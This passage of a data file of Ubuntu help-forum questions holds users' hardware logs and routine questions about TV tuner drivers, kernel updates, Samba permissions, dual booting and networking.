loading firmware for type=base f8mhz mts ( 7 ) , id 0000000000000000 . [ 12745.915089 ] mts ( 4 ) , id 00000000000000ff : [ 12745.915100 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 0000000100000007 . [ 12746.161668 ] em28xx # 0 : v4l2 video device registered as video1 [ 12746.161673 ] em28xx # 0 : v4l2 vbi device registered as vbi0 [ 12746.162845 ] em28xx-audio.c : probing for em28xx audio vendor class [ 12746.162848 ] em28xx-audio.c : copyright ( c ) 2006 markus rechberger [ 12746.162851 ] em28xx-audio.c : copyright ( c ) 2007-2011 mauro carvalho chehab [ 12746.221099 ] xc2028 15-0061 : attaching existing instance [ 12746.221105 ] xc2028 15-0061 : type set to xceive xc2028/xc3028 tuner [ 12746.221109 ] em28xx # 0 : em28xx # 0/2 : xc3028 attached [ 12746.221113 ] dvb : registering new adapter ( em28xx # 0 ) [ 12746.221118 ] dvb : registering adapter 0 frontend 0 ( micronas drxd dvb-t ) ... [ 12746.221869 ] em28xx # 0 : successfully loaded em28xx-dvb [ 13111.196055 ] xc2028 15-0061 : loading firmware for type=base f8mhz mts ( 7 ) , id 0000000000000000 . [ 13112.720062 ] mts ( 4 ) , id 00000000000000ff : [ 13112.720072 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 0000000100000007 . [ 13214.956057 ] xc2028 15-0061 : loading firmware for type=base f8mhz mts ( 7 ) , id 0000000000000000 . [ 13216.479806 ] mts ( 4 ) , id 00000000000000ff : [ 13216.479816 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 0000000100000007 . [ 13276.408056 ] xc2028 15-0061 : loading firmware for type=base f8mhz mts ( 7 ) , id 0000000000000000 . [ 13277.932093 ] mts ( 4 ) , id 00000000000000ff : [ 13277.932104 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 0000000100000007 . [ 13305.032076 ] xc2028 15-0061 : loading firmware for type=base f8mhz mts ( 7 ) , id 0000000000000000 . [ 13306.556449 ] mts ( 4 ) , id 00000000000000ff : [ 13306.556460 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 0000000100000007 . [ 13392.236055 ] xc2028 15-0061 : loading firmware for type=base f8mhz mts ( 7 ) , id 0000000000000000 . [ 13393.760123 ] mts ( 4 ) , id 00000000000000ff : [ 13393.760133 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 0000000100000007 . [ 13637.534053 ] usb 1-4 : usb disconnect , device number 3 [ 13637.534183 ] em28xx # 0 : disconnecting em28xx # 0 video [ 13637.560214 ] em28xx # 0 : v4l2 device vbi0 deregistered [ 13637.560335 ] em28xx # 0 : v4l2 device video1 deregistered [ 13637.561237 ] xc2028 15-0061 : destroying instance [ 13639.772120 ] usb 1-4 : new high-speed usb device number 4 using ehci_hcd [ 13639.911351 ] em28xx : new device wintv hvr-900 @ 480 mbps ( 2040:6502 , interface 0 , class 0 ) [ 13639.911357 ] em28xx : audio vendor class interface 0 found [ 13639.911637 ] em28xx # 0 : chip id is em2882/em2883 [ 13640.094262 ] em28xx # 0 : i2c eeprom 00 : 1a eb 67 95 40 20 02 65 d0 12 5c 03 82 1e 6a 18 [ 13640.094280 ] em28xx # 0 : i2c eeprom 10 : 00 00 24 57 66 07 01 00 00 00 00 00 00 00 00 00 [ 13640.094295 ] em28xx # 0 : i2c eeprom 20 : 46 00 01 00 f0 10 02 00 b8 00 00 00 5b e0 00 00 [ 13640.094311 ] em28xx # 0 : i2c eeprom 30 : 00 00 20 40 20 6e 02 20 10 01 01 01 00 00 00 00 [ 13640.094326 ] em28xx # 0 : i2c eeprom 40 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 13640.094341 ] em28xx # 0 : i2c eeprom 50 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 13640.094356 ] em28xx # 0 : i2c eeprom 60 : 00 00 00 00 00 00 00 00 00 00 18 03 34 00 30 00 [ 13640.094371 ] em28xx # 0 : i2c eeprom 70 : 32 00 37 00 38 00 32 00 33 00 39 00 30 00 31 00 [ 13640.094386 ] em28xx # 0 : i2c eeprom 80 : 00 00 1e 03 57 00 69 00 6e 00 54 00 56 00 20 00 [ 13640.094401 ] em28xx # 0 : i2c eeprom 90 : 48 00 56 00 52 00 2d 00 39 00 30 00 30 00 00 00 [ 13640.094416 ] em28xx # 0 : i2c eeprom a0 : 84 12 00 00 05 50 1a 7f d4 78 23 fa fd d0 28 89 [ 13640.094432 ] em28xx # 0 : i2c eeprom b0 : ff 00 00 00 04 84 0a 00 01 01 20 77 00 40 1d b7 [ 13640.094447 ] em28xx # 0 : i2c eeprom c0 : 13 f0 74 02 01 00 01 79 63 00 00 00 00 00 00 00 [ 13640.094462 ] em28xx # 0 : i2c eeprom d0 : 84 12 00 00 05 50 1a 7f d4 78 23 fa fd d0 28 89 [ 13640.094477 ] em28xx # 0 : i2c eeprom e0 : ff 00 00 00 04 84 0a 00 01 01 20 77 00 40 1d b7 [ 13640.094492 ] em28xx # 0 : i2c eeprom f0 : 13 f0 74 02 01 00 01 79 63 00 00 00 00 00 00 00 [ 13640.094509 ] em28xx # 0 : eeprom id= 0x9567eb1a , eeprom hash = 0x2bbf3bdd [ 13640.094512 ] em28xx # 0 : eeprom info : [ 13640.094515 ] em28xx # 0 : ac97 audio ( 5 sample rates ) [ 13640.094517 ] em28xx # 0 : 500ma max power [ 13640.094521 ] em28xx # 0 : table at 0x24 , strings=0x1e82 , 0x186a , 0x0000 [ 13640.097391 ] em28xx # 0 : identified as hauppauge wintv hvr 900 ( r2 ) ( card=18 ) [ 13640.099617 ] tveeprom 15-0050 : hauppauge model 65018 , rev b2c0 , serial # 1292061 [ 13640.099623 ] tveeprom 15-0050 : tuner model is xceive xc3028 ( idx 120 , type 71 ) [ 13640.099629 ] tveeprom 15-0050 : tv standards pal ( b/g ) pal ( i ) pal ( d/d1/k ) atsc/dvb digital ( eeprom 0xd4 ) [ 13640.099634 ] tveeprom 15-0050 : audio processor is none ( idx 0 ) [ 13640.099637 ] tveeprom 15-0050 : has radio [ 13640.112849 ] tuner 15-0061 : tuner -1 found with type ( s ) radio tv . [ 13640.112877 ] xc2028 15-0061 : creating new instance [ 13640.112882 ] xc2028 15-0061 : type set to xceive xc2028/xc3028 tuner [ 13640.115930 ] xc2028 15-0061 : loading 80 firmware images from xc3028-v27.fw , type : xc2028 firmware , ver 2.7 [ 13640.164057 ] xc2028 15-0061 : loading firmware for type=base mts ( 5 ) , id 0000000000000000 . [ 13641.666643 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 000000000000b700 . [ 13641.693262 ] xc2028 15-0061 : loading scode for type=mts lcd nogd mono if scode has_if_4500 ( 6002b004 ) , id 000000000000b700 . [ 13641.820765 ] registered ir keymap rc-hauppauge [ 13641.820958 ] input : em28xx ir ( em28xx # 0 ) as /devices/pci0000:00/0000:00:1a.7/usb1/1-4/rc/rc2/input11 [ 13641.821335 ] rc2 : em28xx ir ( em28xx # 0 ) as /devices/pci0000:00/0000:00:1a.7/usb1/1-4/rc/rc2 [ 13641.822256 ] em28xx # 0 : config register raw data : 0xd0 [ 13641.824526 ] em28xx # 0 : ac97 vendor id = 0xffffffff [ 13641.825503 ] em28xx # 0 : ac97 features = 0x6a90 [ 13641.825507 ] em28xx # 0 : empia 202 ac97 audio processor detected [ 13641.899015 ] em28xx # 0 : v4l2 driver version 0.1.3 [ 13641.944064 ] xc2028 15-0061 : loading firmware for type=base f8mhz mts ( 7 ) , id 0000000000000000 . [ 13643.470765 ] mts ( 4 ) , id 00000000000000ff : [ 13643.470776 ] xc2028 15-0061 : loading firmware for type=mts ( 4 ) , id 0000000100000007 . [ 13643.717713 ] em28xx # 0 : v4l2 video device registered as video1 [ 13643.717718 ] em28xx # 0 : v4l2 vbi device registered as vbi0 [ 13643.718770 ] em28xx-audio.c : probing for em28xx audio vendor class [ 13643.718775 ] em28xx-audio.c : copyright ( c ) 2006 markus rechberger [ 13643.718778 ] em28xx-audio.c : copyright ( c ) 2007-2011 mauro carvalho chehab [ 13643.777148 ] xc2028 15-0061 : attaching existing instance [ 13643.777154 ] xc2028 15-0061 : type set to xceive xc2028/xc3028 tuner [ 13643.777158 ] em28xx # 0 : em28xx # 0/2 : xc3028 attached [ 13643.777162 ] dvb : registering new adapter ( em28xx # 0 ) [ 13643.777167 ] dvb : registering adapter 0 frontend 0 ( micronas drxd dvb-t ) ... [ 13643.777876 ] em28xx # 0 : successfully loaded em28xx-dvb and here goes the lsmod output lsmod|grep em28xx em28xx_dvb 18579 0 dvb_core 110619 1 em28xx_dvb em28xx_alsa 18305 0 em28xx 109365 2 em28xx_dvb , em28xx_alsa v4l2_common 16454 3 tuner , tvp5150 , em28xx videobuf_vmalloc 13589 1 em28xx videobuf_core 26390 2 em28xx , videobuf_vmalloc rc_core 26412 10 rc_hauppauge , ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , em28xx , ir_nec_decoder snd_pcm 97188 3 em28xx_alsa , snd_hda_intel , snd_hda_codec tveeprom 21249 1 em28xx videodev 98259 5 tuner , tvp5150 , em28xx , v4l2_common , uvcvideo snd 78855 14 em28xx_alsa , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device is n't this driver mainline now ? or this card is not supported ? or the analog functionality is screwed ? i need the analog capture working for this card . please help !
187499	landscape-like tool to distribute security upgrades to os ?	i 'm looking for an alternative to landscape , spacewalk ( for rhel ) , or ctl to perform a specific job . i need to control and apply os upgrades on ubuntu systems , for 100+ servers , and so far i was n't that lucky . i 've tried approx tool ( similar to apt-proxy ) , but it just caches the content , and what i really need to do is set update milestones , apply the upgrades to qa servers , validate , then stage environment , and so on to production . i hope i was clear enough , any answer will be much appreciated .
187502	how do i use apt-get to update to the latest kernel ?	my current kernel is 3.2.0-26 ( my main computer ) while on another of my ubuntu computers , with which i did n't fiddle with unofficial updates , it 's 3.2.0-30 . yet the update manager on my main computer does n't show available kernel updates . it shows other updates though . i suspect is due to the fact that in the past i installed multiple mainline kernel versions ( not recommended versions ) , up to 3.5* series . what i 'm after : either : fix automatic kernel updates . or : learn about a way to check for the latest official ubuntu kernel version and get it manually ( i know how to install kernels from debs ) what i have already tried : uninstalled unused kernels including `` the generic one without a number '' as per http : //askubuntu.com/a/103875/29347 and then also https : //ubuntugenius.wordpress.com/2011/01/08/ubuntu-cleanup-how-to-remove-all-unused-linux-kernel-headers-images-and-modules/
187507	is there any ubuntu translation indicator ?	for more precision : i 'm runnning ubuntu 12.04 i 'd like an indicator which shows up to the left of the date/volume/wifi icons if possible i 'd like to be able to change the translation language the indicator could use internet based translators ( google translate etc . ) or have a complete library come with it so translations can be obtained offline . relating to usability : i 'd like to have it work in a way where you click on the indicator icon and you can start typing either directly or once a window has opened and it instantly shows the translation you need ( with your target languages pre-set or determined in options ) .
187509	how to turn off passwords ?	when i start firestarter , the firewall program asks for my password . how do i turn off my firestarter password ? i want firestarter to start on computer startup but it wo n't because it 's password protected .
187510	ca n't boot into windows after installing ubuntu with wubi	i installed ubuntu with the windows installer and when i turn on my computer , ubuntu just starts and i ca n't get to windows again . windows is my main os for developing apps so i need to be able to access it . please help .
187511	how can i use a .ovpn file with network manager ?	i have a .ovpn file with my vpn config - it works fine when i do sudo openvpn -- config ~jrg/documents/vpn-config.ovpn in the terminal , but i 'd like to use network manager . how can i do this ?
187513	how to mount an iso ( or nrg ) image and rip it as if it were a physical cd ?	i have an iso ( created from an nrg with nrg2iso ) backup of a beloved game from my youth : dark reign : rise of the shadowhand ( 1998 ) . i with to relive those better times by listening to game 's soundtrack . is there a way for me to mount said iso in such a way that i can rip the audio tracks into mp3 files ? i ask because although i can successfully mount the iso , ripit / abcde report no cd inserted . how i mounted the iso : sudo mount -t iso9660 -o loop iso.iso /media/iso alternatively is there another way to recover audio from iso / nrg images ? update : i was able to mount the nrg version of my backup in a way that ripit recognized using gcdemu . ripit failed to rip , however , barfing on the first track - which is most definitely a data track . is there a way to make ripit ignore the first track ?
187514	how to share my wireless connection to other wireless devices	i am aware that i can share my wired internet connection to other devices wirelessly , but what i need now is a little more complex . i am limited to one device over the wifi but would like my macbook to have internet as well . it 's in another room so ethernet is not really an option . i really would like to share the wireless from my ubuntu ( it 's on more ) to other wireless devices . after some light googling i ca n't find anything even remotely useful as they all involve an ethernet cable at some point . has anyone here had any luck with anything similar ? i am running 12.04 lts just for reference and have a belkin g wireless usb device . if anyone knows a possible procedure i can find out about the chipset etc . if needed . i understand there may be hardware limitations .
187520	firefox focus homepage	on firefox 's latest version , using tabmixplus or otherwise , is it possible to give focus to the page when a new tab is opened ( which is the homepage , in my case ) , rather than the address bar ?
187527	cant set up swap memory	my system was recently locking up , and i realized that all my ram was all used up . i then inserted an old hard drive and made an 8gb swap partition to compensate . swap memory is `` not avaliable '' which means i need to activate it . how do i do so ?
187536	slide pane in impress not on the left side	i accidentally moved my slide pane in impress from the left side and i do n't know how to put it back .
187541	i 've got a blue exclamation in the title bar and it wo n't go away	12.04 every time i boot my machine , theres a blue exclamation point on the top right , to the left of the standard indicators . when i click it , it says `` information available '' . clicking on that opens a window with a bunch of mixed english / japanese / hebrew / whatever text and at the bottom there 's something legible : '' the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . flashplugin-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection . '' the update does n't work , so the icon keeps coming back . i do n't think flash is working in my browser , but right now i could n't care less . what do i click to get rid of the pointless blue exclamation mark ?
187543	wifi problem in ubuntu using macbook pro when it restart	i was read that subject : http : //ubuntuforums.org/showthread.php ? t=2011756 and i follow it step by step in the page n 1 , then i was connect but after i restart my macbook again , i was lost the wifi connection.i dont know why or whats the problem exactly . every time i run this command : dmesg | grep -e b43 -e bcma i get this output : [ 2012.769684 ] bcma-pci-bridge 0000:02:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 2012.769701 ] bcma-pci-bridge 0000:02:00.0 : setting latency timer to 64 [ 2012.769775 ] bcma : core 0 found : chipcommon ( manuf 0x4bf , id 0x800 , rev 0x25 , class 0x0 ) [ 2012.769808 ] bcma : core 1 found : ieee 802.11 ( manuf 0x4bf , id 0x812 , rev 0x1d , class 0x0 ) [ 2012.769889 ] bcma : core 2 found : pcie ( manuf 0x4bf , id 0x820 , rev 0x13 , class 0x0 ) [ 2012.770175 ] bcma : pmu resource config unknown for device 0x4331 [ 2012.824527 ] bcma : bus registered [ 2012.831744 ] b43-phy0 : broadcom 4331 wlan found ( core revision 29 ) [ 2013.371031 ] b43-phy0 : loading firmware version 666.2 ( 2011-02-23 01:15:07 ) and to get the connection again every time i must entery that code in the step of reload driver . how i can let the ubuntu see my wifi and wireless device automatically when i reboot my computer ? ? ? ?
187546	replace multiple files with one file	imagine my directory looked like this : ./original.txt ./blah.1.txt ./blah.2.txt [ ... ] ./blah.999999.txt i essentially want to replace every blah . * file with the contents of original . my initial try was to do this : $ cp original.txt blah . * but i get : cp : target `` blah.1.txt ' is not a directory
187559	how do i create a default folders for new users ?	what i want to do is this : when i create a new user in ubuntu , i want him to have a copy of a folder , let 's call him `` abc '' , in his own home directory . is there any way to automate this or do i have to copy the folder by myself each time ? can i for example use /etc/skel for this job ? thanks !
187566	what can be considered too high or too low volume ?	i 've asked a question about what audio volume to use when recording : recording audio : what is the best volume setting ? in there , i learned that : i should avoid too high a volume , to prevent clipping i should avoid too low a volume , to prevent loss of resolution the question now is : what is too high a volume ? what is too low ? i am setting the volume via the gui for sound config . it has an unamplified setting , a 100 % setting , and volumes beyond 100 % . after 100 % , is there still resolution loss ? how can i tell if there is clipping going on ( given that my recording program is the non-gui ffmpeg ) ?
187572	installing 2 copies of ubuntu 12.04	i am currently running a dual boot system with ubuntu 12.04 ( 64 bit ) and windows7 . i am trying to install a toolkit which has conflict with some opencv libraries . i tried cleaning up my libraries and some fixes but none of them work . i want test this toolkit on a fresh ubuntu install . can i make another fresh install of ubuntu 12.04 , without affecting the current installation ? thanks
187573	memtest with ubuntu 12.04 live cd	i 've probably missed something but i ca n't find the memtest option when booting from my ubuntu 12.04 live usb . could someone please tell me how to get to it ?
187577	how to deal with corrupted bin/sh ?	i messed up my bin/sh file , overwriting it with a database file in virtualmin . after i restarted , ubuntu server wo n't start properly anymore . the error i face is : init : failed to spawn plymouth main process : unable to execute : no such file or directory . i have a live cd here but i do n't really know how to use it to overwrite the corrupted bin/sh . could someone help me resolve the situation .
187584	libreoffice3.5 disappears from ubuntu12.04	it seems that libreoffice disappears from ubuntu12.04 after upgrade . i wan na reinstall it by sudo apt-get install libreoffice but failed with : the following packages have unmet dependencies : libreoffice : depends : libreoffice-core ( = 1:3.6.0~rc4-0ubuntu3~ppa1~precise1 ) but it is not going to be installed depends : libreoffice-writer but it is not going to be installed depends : libreoffice-calc but it is not going to be installed depends : libreoffice-impress but it is not going to be installed depends : libreoffice-draw but it is not going to be installed depends : libreoffice-math but it is not going to be installed depends : libreoffice-base but it is not going to be installed recommends : libreoffice-gnome but it is not going to be installed or libreoffice-kde but it is not going to be installed e : unable to correct problems , you have held broken packages .
187587	hdmi audio output problems with radeon card	no matter how much advice i follow , i still can not get any audio to come out through my hdmi connection . i 've tried downloading the latest proprietary fglrx graphics drivers , and i 've also gone into /etc/default/grub and altered grub_cmdline_linux_default= '' quiet splash '' into this grub_cmdline_linux_default= '' quiet splash radeon.audio=1 '' but still i can not get any sound nor can i get hdmi sound output to show up in sound settings or pulse audio volume control . i can get video to show up just fine on my monitor through hdmi so i 'm sure this problem is fixable ! i know this is an old problem with ubuntu , but any new strategies into the problem would be much appreciated . with that being said , here are some of my specs : ubuntu 12.04 lts amd radeon hd 7520g
187589	samsung ultrabook usb stick install of ubuntu fails , keeps booting windows	i 'm trying to install ubuntu on a samsung ultrabook via a usb stick . i 've tried 12.04 both regular and alternate on 3 different usb sticks but not having success . the laptop just keeps booting into windows . i used unetbootin to create the usb image as this worked for when when doing a toshiba ultrabook installation . i reset my boot menu to be 1 usb hdd 2 usb cd 3 usb fdd 4 sata hdd sandisk ssd u100 128gb then f10 'd but no success , still boots windows . i 've tried changing uefi boot support to be enabled and i 've tried changing pxe oprom to be enabled but neither has helped .
187590	is there a key tracking software for ubuntu 12.04 . lenovo u400	my new computer has something weird on the keyboard . lenovo u400 it jumps around a lot and i disabled trackpad while typing and did a bunch of stuff , but just jumps around a lot , but when i type slow , nothing like that happens , when i type on an external keyboard , nothing like that happens either . i was wondering if there is a software where i can track my typing plus touch pad clicking , so i know if my hands are accidently knocking keys around . thanks .
187591	how can i get samba users from the same group to edit each others files ?	i 'm setting up my first linux fileserver for windows clients and am having some problems properly setting up the shares . i have a shared folder via samba where multiple users ( who are organized by group ) should have permissions of rwxrwx -- - ( 0770 ) . but when user `` joe '' creates a folder and a file within it , user `` jane '' can not move those files out or create files there . ubuntu 12.04 3.2.0-30-generic samba version 3.6.3 from /etc/samba/smb.conf [ sharename ] path = /srv/samba/sharename ; browseable = yes writeable = yes valid users = @ somegroup force group = somegroup create mode = 0770 force create mask - 0770 directory mode = 0770 force directory mode = 0770 inherit permissions = yes vfs object = recycle recycle : repository = recyclebin recycle : keeptree = yes recycle : exclude = *.tmp , *.bak how can i make it so that members of the same security group can edit each other 's work ? i 've already set the initial permissions to be : drwxrwx -- - 7 root somegroup 4096 jan 01 12:00 sharename by issuing : sudo chmod 0770 -r /srv/samba/sharename and then : sudo chgrp somegroup -r /srv/samba/sharename i 'd still like to know who owns each file and who edited the file last , but want members of the same group edit each other 's work . any ideas or help is greatly appreciated . i 'm trying to keep this small business from buying a windows domain controller if possible .
187592	how to add `` shutdown '' to the list of `` when the lid is closed '' in power settings ?	i 'd like to shutdown my laptop by closing the lid ; but in power settings there 's no option to do that . is there any way to add `` shutdown '' to the pop-down list in the power settings for `` when the lid is closed '' ? i prefer the way through the terminal without installing a third-party application .
187601	ear phone port not working in dell inspiron 3520 ubuntu 12.04	i bought dell inspiron 3520 four days back and installed windows , ubuntu 12.04 64 bit ( dual boot ) .sound is coming properly from the speakers . if i connect ear phone , there is no sound.specification : intel i5 3rd gen , ram:8gb.it works well in windows 7 .
187602	can you create a presentation outline in libreoffice writer ?	i 'm taking a microsoft powerpoint class and i want to know if it 's possible to create a libreoffice impress presentation outline in libreoffice writer . my computer has libreoffice and it so far has the same features and functions as microsoft office .
187607	help me to install ppp server on ubuntu 12.04 server	i want build ppp server on ubuntu 12.04 server . i failed even after tried to install ppp server numerous times . i want to build ppp server like the below environment . ppp client : modem -- -- -- - > nas network access sever -- -- -- -- -- -- -- -- -- -- > inthernet ( isp ) ( embedded target ) ... ... ... ( ppp server : ubuntu 12.04 installed vmware ) embedded target was installed ppp client , so i am concerned about ppp server on ubuntu . i installed pptpd , ppp , mgetty , openssl packages and i set configurations up according to this . however , it 's not working . debugging info is dial start : atdt9,750**** form modem : atdt9,750**** route : siocdelrt : no such process ppp start : /root/daehap/ppp/ppp-on atdt9,750**** 00005 @ ****.*** . ** 1234 115200 & : : : : : time end -dial : 700 connect 28800 28800 protocol : v42bis debian gnu/linux ttys1 38400 ( 38400 ) **emsi_reqa77e^q ubuntu login : 00005 @ ****.*** . ** password : serial connection established . using channel 7 using interface ppp0 connect : ppp0 < -- > /dev/ttys1 warning - secret file /etc/ppp/pap-secrets has world and/or group sent [ lcp confreq id=0x1 asyncmap 0x0 > magic 0x54e5c85e > pcomp > accomp > ] sent [ lcp confreq id=0x1 asyncmap 0x0 > magic 0x54e5c85e > pcomp > accomp > ] rcvd [ lcp confreq id=0x1 asyncmap 0x0 > magic 0x54e5c85e > pcomp > accomp > ] sent [ lcp confnak id=0x1 magic 0x1a78e02e > ] rcvd [ lcp confnak id=0x1 magic 0x1a78e02e > ] sent [ lcp confreq id=0x2 asyncmap 0x0 > magic 0x64a91fc7 > pcomp > accomp > ] sent [ lcp confreq id=0x2 asyncmap 0x0 > magic 0x64a91fc7 > pcomp > accomp > ] sent [ lcp confreq id=0x2 asyncmap 0x0 > magic 0x64a91fc7 > pcomp > accomp > ] sent [ lcp confreq id=0x2 asyncmap 0x0 > magic 0x64a91fc7 > pcomp > accomp > ] rcvd [ lcp confreq id=0x2 asyncmap 0x0 > magic 0x64a91fc7 > pcomp > accomp > ] sent [ lcp confnak id=0x2 magic 0xf0e6bde2 > ] rcvd [ lcp confnak id=0x2 magic 0xf0e6bde2 > ] . . . i think ppp server did n't communicate lcp protocol . what do i do to make it work ? please give me idea .
187609	can not boot win7 after installing 12.04	i know this comes up quite a bit , but none of the other questions have helped me . i have tried using boot repair , but did n't have any luck . this is what it comes up with : http : //paste.ubuntu.com/1204105/ i have 3 hard drives - 1 60gb with windows 7 , 1 300gb with games , programs , and music , and 1 320gb that i decided to install ubuntu on . i thought i did everything correctly , but windows 7 does n't come up as an option in grub , nor can i boot to the windows drive anymore . it hangs at the loading screen . i have also tried the bootrec.exe/fixmbr and fixboot trick as well , and while they said they were successful i still can not boot to the drive . i have not touched the windows 7 partitions . unfortunately there are a few files i have on the windows partition that i 'd like to recover if possible , but the drive does n't show up for me at all . this is my first real run with linux , although i have used bootable cds before , so i think it 's safe to say that i do n't know what i 'm doing . any suggestions ?
187612	how can i fix the `` term environment variable not set '' warning in eclipse	i 'm running ubuntu 12.04 lts and working with eclipse ( juno ) on a c++ project . i keep getting `` term environment variable not set '' in the console while trying to run the program . i realize this means the variable needs to get set . my question is what should it be set to and how do i set it ? i 've read that it should be 'xterm ' in a few places . so i added export term=xterm in my .profile and while eclipse stopped giving me the warning , instead it would output unreadable garbage everynow and then ( not a side effect of the program ) . it did display the program output but intermixed were weird characters . this leads me to believe it 's not 'xterm ' i should be setting term to . or i 'm setting it in an incorrect way . any help is appreciated . sample output : **term environment variable not set . ** please make a selection -- -- -- -- -- -- -- -- -- -- -- - 1 . create a budget 2 . edit a budget 3 . display a budget 4 . save a budget 5 . load a budget 6 . exit what is your selection : 1 **term environment variable not set . ** enter the name of your budget : etc the program continues to execute as expected but the message is highly annoying as someone has commented , i do use system ( `` clear '' ) which is likely the source of the warning ? either way , is this likely just an eclipse issue or something i can fix in ubuntu/linux
187614	dragging and dropping a file on launcher icon does not raise the window in unity	i know this is a possible duplicate but i do have not a convincing answer yet . i initially did not like unity and did not switch to it till 12.04 ( used gnome fallback ) . i have started using it only when 12.04 came out . here is the problem . whenever i want to drag a file from one window to another ( like nautilus to gmail in chrome or vlc playlist etc ) , i usually drag it to the taskbar/panel and wait for the destination window to raise/focus and then i drop the file . i have found this feature ever since i started using computers . heck , even windows 2000 , xp could do it . gnome could do it ever since i started using it ( 8.04 ubuntu ) . it does not work with unity in 12.04 . i have had to install ugly xfce4-panel just for this purpose . but i am hardwired to first drag it to unity and then realize it does not work and then drag it to xfce4-panel . is there a possible workaround or a patch somebody has written that can i can install and not worry about it at all ?
187617	how to get ubuntu one icon onto desktop	i 'm using ubuntu 12.04 with the gnome desktop from the software center . i just installed ubuntu 1 , but it did n't put an icon on my desktop . how do i get one there ?
187624	10.04.4 unresponsive	i just updated to ubuntu 10.04.4 lts . but after the update , my computer is unresponsive . i used to be able to click on my name , then i would be prompted to enter my password . this is no longer available , and i no longer have access to anything on my laptop . any ideas on how to correct this ?
187631	upgrade from win 7 to win 8	i currently have windows 7 and latest ubuntu installed on the system . i installed ubuntu using the wubi.exe which made it easy for me to install ubuntu from an existing windows installation . now if i upgrade from windows 7 to windows 8 will the current ubuntu installation get deleted ? will it be affected in any way ?
187639	any examples of how to write an application that is executable from the terminal like git ?	i want to write an ubuntu application that helps me deal with a web-based api . i can write it in python , but i want to know how to build it so that i can execute it as a command on the terminal itself .
187644	error no room on ep ring with usb 3.0 device	just did a clean install of mythbuntu 12.04 yesterday on a brand new machine . asrock z77 extreme4 with intel video chipset , 8gb ram . i 'm seeing google references to this as a usb 3 issue in this driver but as i 'm using stock 12.04 i wanted to at least get a bug ref for ubuntu . entire dmesg is filled with : [ 22822.772021 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 22822.772024 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 22822.772027 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 22822.772030 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 22822.772034 ] xhci_hcd 0000:00:14.0 : error no room on ep ring [ 22822.772037 ] xhci_hcd 0000:00:14.0 : error no room on ep ring information about my system : root @ mythtv : ~ # uname -a linux mythtv 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux root @ mythtv : ~ # lspci -v 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) subsystem : asrock incorporation device 0100 flags : bus master , fast devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : asrock incorporation device 0102 flags : bus master , fast devsel , latency 0 , irq 54 memory at f7800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 kernel modules : i915 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : asrock incorporation device 1e31 flags : bus master , medium devsel , latency 0 , irq 47 memory at f7f00000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : [ 70 ] power management version 2 capabilities : [ 80 ] msi : enable+ count=1/8 maskable- 64bit+ kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) subsystem : asrock incorporation device 1e3a flags : bus master , fast devsel , latency 0 , irq 53 memory at f7f1a000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : [ 50 ] power management version 3 capabilities : [ 8c ] msi : enable+ count=1/1 maskable- 64bit+ kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : asrock incorporation device 1e2d flags : bus master , medium devsel , latency 0 , irq 16 memory at f7f18000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) subsystem : asrock incorporation device 1898 flags : bus master , fast devsel , latency 0 , irq 55 memory at f7f10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : dfb00000-dfcfffff prefetchable memory behind bridge : 00000000dfd00000-00000000dfefffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asrock incorporation device 1e10 